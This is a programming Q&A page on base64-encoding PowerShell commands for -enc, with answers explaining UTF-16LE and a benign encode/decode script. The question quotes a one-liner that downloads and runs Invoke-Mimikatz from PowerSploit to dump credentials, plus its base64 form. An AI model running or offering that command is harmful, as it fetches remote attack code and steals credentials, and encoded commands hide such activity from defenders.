user134167

Reputation: 195

Powershell base64 encoding required

I want to execute base64 encoded commands in PowerShell. For example, I took a command from this GitHub repo: https://gist.github.com/gfoss/ca6aa37f97fd400ff14f. Running the mimikatz one:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m

If I run it straight in a PowerShell prompt, it works correctly. Checking the base64 encoded version, I see that it also works correctly:

powershell -enc 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

However, I'm not sure how that string was encoded. If I try to encode it in Linux, I get a different string (I just changed the quotes to prevent bash interpreting the $):

echo -e 'IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); $m = Invoke-Mimikatz -DumpCreds; $m' | openssl enc -base64 -A

SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vUG93ZXJTaGVsbE1hZmlhL1Bvd2VyU3Bsb2l0L21hc3Rlci9FeGZpbHRyYXRpb24vSW52b2tlLU1pbWlrYXR6LnBzMSIpOyAkbSA9IEludm9rZS1NaW1pa2F0eiAtRHVtcENyZWRzOyAkbQo=

This encoding fails when I try to run it with powershell -enc.

What encoding should I use to make the string completely compatible with PowerShell?

Upvotes: 4

Views: 12805

Answers (2)

Mathias R. Jessen

Reputation: 174425

PowerShell expects the base64 string to be Unicode encoded - and Unicode is Windows-lingo for little-endian UTF-16.

You can use iconv to convert to UTF-16LE if you need to encode a PowerShell command from a Linux shell without access to .NET:

iconv -f ASCII -t UTF-16LE filename.txt | base64 -w 0

Upvotes: 6
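Putting the answer above into a reusable form, as an added example that is not part of the original post or answer: the encoder converts the command to UTF-16LE before base64, the decoder reverses it (handy when you find a `powershell -enc ...` string in a log and want to read it), and a plain UTF-8 encoder shows what the question's `openssl enc -base64` pipeline produced by comparison. It assumes a glibc-style `iconv` and a `base64` that accepts `-d`; the sample command is constructed for the demo and is not from the page.

```bash
#!/usr/bin/env bash
# Added example (not from the original Q&A): encode a command the way
# PowerShell's -EncodedCommand expects, and decode one back.
# Assumes: glibc/GNU iconv (UTF-8 -> UTF-16LE) and a base64 that supports -d.
set -e

# PowerShell wants base64 over little-endian UTF-16 bytes.
# - printf '%s' instead of echo, so no trailing newline ends up in the payload.
# - '-t UTF-16LE', not '-t UTF-16': the latter prepends a byte-order mark,
#   which would then be encoded as part of the command.
# - 'base64 | tr -d '\n'' instead of 'base64 -w 0' for portability.
ps_encode() {
    printf '%s' "$1" | iconv -f UTF-8 -t UTF-16LE | base64 | tr -d '\n'
}

# Reverse: base64-decode, then interpret the bytes as UTF-16LE.
# Useful when triaging an encoded command line seen in process or Sysmon logs.
ps_decode() {
    printf '%s' "$1" | base64 -d | iconv -f UTF-16LE -t UTF-8
}

# What the question's approach yields: base64 over UTF-8 bytes.
# PowerShell rejects this for -enc because the bytes are not UTF-16LE.
utf8_encode() {
    printf '%s' "$1" | base64 | tr -d '\n'
}

main() {
    # Constructed sample command (benign), not taken from the page.
    local cmd='Get-Process | Select-Object -First 3'
    local enc
    enc=$(ps_encode "$cmd")

    printf 'UTF-16LE base64 (works with -enc):   %s\n' "$enc"
    printf 'UTF-8 base64 (what openssl produced): %s\n' "$(utf8_encode "$cmd")"

    # Round-trip check: decoding our payload must give the original command back.
    if [ "$(ps_decode "$enc")" = "$cmd" ]; then
        echo "round-trip OK"
    else
        echo "round-trip FAILED" >&2
        return 1
    fi

    # On the Windows side you would then run (not executed here):
    #   powershell -NoProfile -EncodedCommand "$enc"
}

main "$@"
```

A quick sanity check for any encoded blob you meet in the wild: a valid `-enc` payload decodes to text with a `0x00` after every ASCII character, so `base64 -d | xxd | head` showing `d.i.r.` style output is the signature of correct UTF-16LE, while densely packed bytes mean someone encoded UTF-8 and the command will not run.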

4c74356b41

Reputation: 72151

Use one from the PowerShell examples?

[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("command_goes_here"))

Upvotes: 3
